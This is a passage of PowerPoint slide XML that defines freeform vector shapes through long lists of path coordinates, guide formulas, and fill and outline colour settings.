                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="276"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36402" name="Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3291" y="2406"/>
                <a:ext cx="337" cy="296"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 337"/>
                  <a:gd name="T1" fmla="*/ 270 h 296"/>
                  <a:gd name="T2" fmla="*/ 114 w 337"/>
                  <a:gd name="T3" fmla="*/ 252 h 296"/>
                  <a:gd name="T4" fmla="*/ 99 w 337"/>
                  <a:gd name="T5" fmla="*/ 226 h 296"/>
                  <a:gd name="T6" fmla="*/ 88 w 337"/>
                  <a:gd name="T7" fmla="*/ 213 h 296"/>
                  <a:gd name="T8" fmla="*/ 69 w 337"/>
                  <a:gd name="T9" fmla="*/ 194 h 296"/>
                  <a:gd name="T10" fmla="*/ 68 w 337"/>
                  <a:gd name="T11" fmla="*/ 173 h 296"/>
                  <a:gd name="T12" fmla="*/ 59 w 337"/>
                  <a:gd name="T13" fmla="*/ 153 h 296"/>
                  <a:gd name="T14" fmla="*/ 48 w 337"/>
                  <a:gd name="T15" fmla="*/ 142 h 296"/>
                  <a:gd name="T16" fmla="*/ 38 w 337"/>
                  <a:gd name="T17" fmla="*/ 134 h 296"/>
                  <a:gd name="T18" fmla="*/ 35 w 337"/>
                  <a:gd name="T19" fmla="*/ 119 h 296"/>
                  <a:gd name="T20" fmla="*/ 17 w 337"/>
                  <a:gd name="T21" fmla="*/ 92 h 296"/>
                  <a:gd name="T22" fmla="*/ 5 w 337"/>
                  <a:gd name="T23" fmla="*/ 74 h 296"/>
                  <a:gd name="T24" fmla="*/ 0 w 337"/>
                  <a:gd name="T25" fmla="*/ 71 h 296"/>
                  <a:gd name="T26" fmla="*/ 5 w 337"/>
                  <a:gd name="T27" fmla="*/ 54 h 296"/>
                  <a:gd name="T28" fmla="*/ 27 w 337"/>
                  <a:gd name="T29" fmla="*/ 50 h 296"/>
                  <a:gd name="T30" fmla="*/ 41 w 337"/>
                  <a:gd name="T31" fmla="*/ 41 h 296"/>
                  <a:gd name="T32" fmla="*/ 45 w 337"/>
                  <a:gd name="T33" fmla="*/ 25 h 296"/>
                  <a:gd name="T34" fmla="*/ 60 w 337"/>
                  <a:gd name="T35" fmla="*/ 7 h 296"/>
                  <a:gd name="T36" fmla="*/ 72 w 337"/>
                  <a:gd name="T37" fmla="*/ 0 h 296"/>
                  <a:gd name="T38" fmla="*/ 86 w 337"/>
                  <a:gd name="T39" fmla="*/ 6 h 296"/>
                  <a:gd name="T40" fmla="*/ 126 w 337"/>
                  <a:gd name="T41" fmla="*/ 27 h 296"/>
                  <a:gd name="T42" fmla="*/ 132 w 337"/>
                  <a:gd name="T43" fmla="*/ 34 h 296"/>
                  <a:gd name="T44" fmla="*/ 139 w 337"/>
                  <a:gd name="T45" fmla="*/ 40 h 296"/>
                  <a:gd name="T46" fmla="*/ 146 w 337"/>
                  <a:gd name="T47" fmla="*/ 51 h 296"/>
                  <a:gd name="T48" fmla="*/ 198 w 337"/>
                  <a:gd name="T49" fmla="*/ 60 h 296"/>
                  <a:gd name="T50" fmla="*/ 204 w 337"/>
                  <a:gd name="T51" fmla="*/ 67 h 296"/>
                  <a:gd name="T52" fmla="*/ 217 w 337"/>
                  <a:gd name="T53" fmla="*/ 68 h 296"/>
                  <a:gd name="T54" fmla="*/ 223 w 337"/>
                  <a:gd name="T55" fmla="*/ 83 h 296"/>
                  <a:gd name="T56" fmla="*/ 229 w 337"/>
                  <a:gd name="T57" fmla="*/ 85 h 296"/>
                  <a:gd name="T58" fmla="*/ 231 w 337"/>
                  <a:gd name="T59" fmla="*/ 90 h 296"/>
                  <a:gd name="T60" fmla="*/ 240 w 337"/>
                  <a:gd name="T61" fmla="*/ 94 h 296"/>
                  <a:gd name="T62" fmla="*/ 241 w 337"/>
                  <a:gd name="T63" fmla="*/ 100 h 296"/>
                  <a:gd name="T64" fmla="*/ 241 w 337"/>
                  <a:gd name="T65" fmla="*/ 110 h 296"/>
                  <a:gd name="T66" fmla="*/ 244 w 337"/>
                  <a:gd name="T67" fmla="*/ 119 h 296"/>
                  <a:gd name="T68" fmla="*/ 248 w 337"/>
                  <a:gd name="T69" fmla="*/ 125 h 296"/>
                  <a:gd name="T70" fmla="*/ 253 w 337"/>
                  <a:gd name="T71" fmla="*/ 136 h 296"/>
                  <a:gd name="T72" fmla="*/ 257 w 337"/>
                  <a:gd name="T73" fmla="*/ 138 h 296"/>
                  <a:gd name="T74" fmla="*/ 270 w 337"/>
                  <a:gd name="T75" fmla="*/ 165 h 296"/>
                  <a:gd name="T76" fmla="*/ 321 w 337"/>
                  <a:gd name="T77" fmla="*/ 178 h 296"/>
                  <a:gd name="T78" fmla="*/ 332 w 337"/>
                  <a:gd name="T79" fmla="*/ 175 h 296"/>
                  <a:gd name="T80" fmla="*/ 299 w 337"/>
                  <a:gd name="T81" fmla="*/ 216 h 296"/>
                  <a:gd name="T82" fmla="*/ 269 w 337"/>
                  <a:gd name="T83" fmla="*/ 232 h 296"/>
                  <a:gd name="T84" fmla="*/ 206 w 337"/>
                  <a:gd name="T85" fmla="*/ 254 h 296"/>
                  <a:gd name="T86" fmla="*/ 199 w 337"/>
                  <a:gd name="T87" fmla="*/ 260 h 296"/>
                  <a:gd name="T88" fmla="*/ 162 w 337"/>
                  <a:gd name="T89" fmla="*/ 276 h 296"/>
                  <a:gd name="T90" fmla="*/ 145 w 337"/>
                  <a:gd name="T91" fmla="*/ 258 h 296"/>
                  <a:gd name="T92" fmla="*/ 135 w 337"/>
                  <a:gd name="T93" fmla="*/ 257 h 296"/>
                  <a:gd name="T94" fmla="*/ 134 w 337"/>
                  <a:gd name="T95" fmla="*/ 267 h 29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337"/>
                  <a:gd name="T145" fmla="*/ 0 h 296"/>
                  <a:gd name="T146" fmla="*/ 337 w 337"/>
                  <a:gd name="T147" fmla="*/ 296 h 29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337" h="296">
                    <a:moveTo>
                      <a:pt x="128" y="276"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="276"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36403" name="Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3085" y="2588"/>
                <a:ext cx="267" cy="300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 185 w 267"/>
                  <a:gd name="T1" fmla="*/ 298 h 300"/>
                  <a:gd name="T2" fmla="*/ 178 w 267"/>
                  <a:gd name="T3" fmla="*/ 296 h 300"/>
                  <a:gd name="T4" fmla="*/ 159 w 267"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 145 w 267"/>
                  <a:gd name="T7" fmla="*/ 298 h 300"/>
                  <a:gd name="T8" fmla="*/ 125 w 267"/>
                  <a:gd name="T9" fmla="*/ 284 h 300"/>
                  <a:gd name="T10" fmla="*/ 119 w 267"/>
                  <a:gd name="T11" fmla="*/ 289 h 300"/>
                  <a:gd name="T12" fmla="*/ 110 w 267"/>
                  <a:gd name="T13" fmla="*/ 285 h 300"/>
